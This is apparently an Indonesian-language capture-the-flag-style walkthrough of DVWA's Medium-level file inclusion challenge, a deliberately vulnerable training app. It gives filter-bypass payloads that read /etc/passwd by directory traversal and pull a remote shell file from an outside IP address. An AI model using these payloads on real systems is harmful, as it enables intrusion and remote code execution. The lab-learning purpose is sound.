Medium
File Inclusion level Medium on DVWA
Di bawah ini adalah source-code dari file inclusion level Medium di DVWA.
vulnerabilities/fi/source/medium.php
<?php
β
// The page we wish to display
$file = $_GET[ 'page' ];
β
// Input validation
$file = str_replace( array( "http://", "https://" ), "", $file );
$file = str_replace( array( "../", "..\"" ), "", $file );
β
?>
Mencari Informasi
Kali ini jika kita kita menggunakan ../
atau ..\"
untuk LFI dan http://
atau https://
untuk RFI, maka yang teks yang mengandung kata tersebut akan dihilangkan oleh fungsi str_replace()
.
Untuk mengatasi hal ini saya menemukan cara, yaitu menggunakan payload berikut:
..././ -> ../ #hasil setelah dihilangkan
dan
hthttp://tp://0.0.0.0/RFI-Shell.txt -> http://0.0.0.0/RFI-Shell.txt #hasil setelah dihilangkan
Bagaimana? Apakah anda mengerti? Perhatikan pada payload ..././
, str_replace()
akan menghilangkan karakter ../
sehingga hasilnya menjadi ../
. Dan begitu juga yang RFI. Keren bukan? π
Atau kita juga bisa membuka file melalu direktori /
, seperti /etc/passwd seperti berikut:

Kita sebagai peretas memang harus kreatif untuk mengatasi berbagai masalah.π
Melakukan Serangan
Oke, pada kali ini sepertinya kita tetap bisa melakukan LFI maupun RCI.
Local File Inclusion
Di sini saya contohkan mengakses file /etc/passwd menggunakan cara "mundur direktori", sehingga payload yang bisa digunakan adalah seperti berikut:
?page=..././..././..././..././..././etc/passwd

Dan hasilnya berhasil!
Remote File Inclusion
Dari informasi yang telah kita kumpulkan, payload yang akan kita gunakan saat ini adalah seperti berikut:
?page=hthttp://tp://18.215.230.19/RFI-shell.txt

Dan hasilnya shell bisa dijalankan.
Selamat kawan! Happy Hacking! π»
Last updated
Was this helpful?